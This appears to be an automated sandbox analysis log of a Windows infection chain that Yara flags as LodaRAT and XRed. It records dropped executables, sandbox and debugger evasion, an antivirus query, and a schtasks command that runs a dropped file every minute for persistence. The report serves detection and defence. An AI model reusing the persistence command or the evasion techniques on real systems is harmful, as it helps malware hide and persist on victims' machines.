                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeWindow / User API: threadDelayed 4655Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeWindow / User API: foregroundWindowGot 1498Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI coverage: 6.4 %
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeAPI coverage: 3.8 %
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI coverage: 3.8 %
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe TID: 7708Thread sleep time: -46550s >= -30000sJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 1528Thread sleep time: -6120000s >= -30000sJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 3332Thread sleep time: -60000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeLast function: Thread delayed
                                Source: C:\ProgramData\Synaptics\Synaptics.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeThread sleep count: Count: 4655 delay: -10Jump to behavior
                                Source: Yara matchFile source: 00000015.00000002.2552714676.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2549958974.0000000002FBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2549958974.0000000002FDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7856, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, type: DROPPED
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0013DD92 GetFileAttributesW,FindFirstFileW,FindClose,15_2_0013DD92
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00172044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_00172044
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0017219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_0017219F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_001724A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_001724A9
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00166B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,FindNextFileW,FindClose,FindClose,15_2_00166B3F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00166E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,FindNextFileW,FindClose,15_2_00166E4A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,15_2_0016F350
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016FD47 FindFirstFileW,FindClose,15_2_0016FD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0016FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,15_2_0016FDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008D2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_008D2044
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008D219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_008D219F
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008D24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_008D24A9
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008C6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,22_2_008C6B3F
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008C6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,22_2_008C6E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008CF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,22_2_008CF350
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_0089DD92 GetFileAttributesW,FindFirstFileW,FindClose,22_2_0089DD92
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008CFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,22_2_008CFDD2
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008CFD47 FindFirstFileW,FindClose,22_2_008CFD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00172044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,31_2_00172044
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0017219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,31_2_0017219F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_001724A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,31_2_001724A9
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00166B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,31_2_00166B3F
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00166E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,31_2_00166E4A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0016F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,31_2_0016F350
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0016FD47 FindFirstFileW,FindClose,31_2_0016FD47
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0013DD92 GetFileAttributesW,FindFirstFileW,FindClose,31_2_0013DD92
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_0016FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,31_2_0016FDD2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0013E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,15_2_0013E47B
                                Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 4mbwVhvmcI6
                                Source: XNLAGO.exe, 0000001B.00000003.1562973685.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                Source: wscript.exe, 00000000.00000003.1311634064.00000194116B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312583846.00000194116B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312382254.000001940EFC9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310308003.000001940EFC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310253929.000001940EFA3000.00000004.00000020.00020000.00000000.sdmp, ._cache_update.exe, 0000000F.00000002.2555338528.0000000001776000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                                Source: ._cache_update.exe, 0000000F.00000002.2563302122.0000000004BA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI call chain: ExitProcess graph end nodegraph_15-88642
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI call chain: ExitProcess graph end nodegraph_15-86372
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI call chain: ExitProcess graph end nodegraph_15-89011
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0017703C BlockInput,15_2_0017703C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0012374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,15_2_0012374E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_001546D0 LoadLibraryExW,GetLastError,LoadLibraryW,6CA06DE0,6CA06DE0,6CA06DE0,6CA06DE0,6CA06DE0,IsDebuggerPresent,OutputDebugStringW,15_2_001546D0
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_00A2C140 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,22_2_00A2C140
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0014A937 GetProcessHeap,15_2_0014A937
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00148E19 SetUnhandledExceptionFilter,15_2_00148E19
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00148E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00148E3C
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008A8E19 SetUnhandledExceptionFilter,22_2_008A8E19
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 22_2_008A8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_008A8E3C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00148E19 SetUnhandledExceptionFilter,31_2_00148E19
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 31_2_00148E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00148E3C

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Benign windows process drops PE files
                                Source: C:\Windows\System32\wscript.exeFile created: JPS[1].exe.0.drJump to dropped file
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.199.108.133 443Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0015BE95 LogonUserW,15_2_0015BE95
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0012374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,15_2_0012374E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00164B52 SendInput,keybd_event,15_2_00164B52
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00167DD5 mouse_event,15_2_00167DD5
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0015B398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,15_2_0015B398
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0015BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,15_2_0015BE31
                                Source: ._cache_update.exeBinary or memory string: Shell_TrayWnd
                                Source: ._cache_update.exe, 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp, XNLAGO.exe, 00000016.00000002.1564370132.000000000092E000.00000040.00000001.01000000.0000000D.sdmp, XNLAGO.exe, 0000001B.00000002.1572606836.000000000092E000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00147254 cpuid 15_2_00147254
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_001440DA GetSystemTimeAsFileTime,__aulldiv,15_2_001440DA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0019C146 GetUserNameW,15_2_0019C146
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_00152C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,15_2_00152C3C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeCode function: 15_2_0013E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,15_2_0013E47B
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: ._cache_update.exe, 0000000F.00000002.2555338528.0000000001776000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                                Stealing of Sensitive Information

                                barindex
                                Yara detected LodaRAT
                                Source: Yara matchFile source: Process Memory Space: ._cache_update.exe PID: 7704, type: MEMORYSTR
                                Yara detected XRed
                                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                Source: Yara matchFile source: 8.0.update.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.wscript.exe.19411b43684.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000003.1311156718.0000019411790000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000000.1309629259.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1308437430.0000019411CC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 400, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: update.exe PID: 7404, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 7744, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXD42.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exe, type: DROPPED
